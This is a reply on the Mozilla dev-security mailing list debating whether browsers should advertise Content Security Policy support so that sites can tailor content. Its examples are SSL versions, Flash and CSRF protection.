On Dec 19, 12:30 pm, Gervase Markham <g...@mozilla.org> wrote: > > Maybe it's not completely bad for browsers to advertise whether or not > > they support CSP (and which versions). There's a benefit for web > > developers who can decide to serve more restricted/filtered content to > > browsers that won't "catch them when they fall". > If there's additional filtering they know how to do, they should be > doing it for everyone.
I'm not sure I agree with that... take for instance a browser that only supports SSL v2 (and not 3): a site concerned with avoiding MITM attacks might serve different content (or none) to someone whose browser only supports SSL v2, and serve all the site's content to someone whose browser supports v3. That doesn't warrant blocking content to all visitors regardless of what security constructs their browser supports. If the filtering in question just removes possibly- evil data, then yeah, it should be done for everyone. However, the filtering in question might remove site functionality because the client's browser may not play nice. > > consider a webmaster who is just learning some new technology > > X may not be comfortable enough to serve X content without a safety > > net that CSP provides, but is being pressured to add features to his > > site. > Then he shouldn't use X. (Who designed X to be unsafe by default? Go > shoot them. :-) I see your point. One would hope X is not *designed* to be unsafe, but it might not be rock-solid, with a history of security issues (like Flash). The webmaster might not feel completely comfortable with his mastery of it, so only feels comfortable providing Flash- based content to people whose browsers will help protect them. I block Flash content from most sites (and don't employ it on my own web sites), but may change my ways if CSP were available to help out with more CSRF protection. -Sid _______________________________________________ dev-security mailing list dev-security@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-security